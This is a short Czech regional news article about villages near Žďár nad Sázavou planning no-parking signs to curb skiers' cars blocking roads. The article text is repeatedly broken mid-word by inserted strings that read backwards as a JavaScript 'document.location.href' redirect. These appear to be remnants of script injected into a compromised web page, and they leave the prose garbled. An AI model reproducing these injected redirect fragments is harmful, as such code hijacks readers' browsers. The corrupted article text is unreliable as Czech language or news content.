Rainbow page separator

Obce se pro příští zimy chystají omezit parkování běžkařů

Pondělí, 4. března 2019

Běžecké stopy

Žďársko / Kolonám aut lyžařů, které blokují obce i okraje silnic v lokalitách, kudy vedou strojově upravené běžkařské s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topy, se po le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní na sníh náročné zimě chtějí alespoň částečně vyhnout tamní starousedlíci. Jedná se především o oblasti na Žďársku a Novoměstsku.
V některých obcích už pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zastupitelé rozhodli, že po dohodě s dopravním inspek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torátem v konkrétních lokalitách nechají umístit dopravní značky se zákazem stání či zastavení. Například v případě Vlachovic půjde o komunikaci vedoucí k rekreačnímu středisku Pegas, a proti ucpávání obce auty běžkařů se zákazovými značkami chystají ohradit třeba také ve Třech Studních. Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos tam řešili nejen [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, že obyvatelé přes odstavené au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobily turistů nemohli vyjet ze svých pozemků, ale navíc se za těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to okolností zkomplikovala i zimní údržba obce.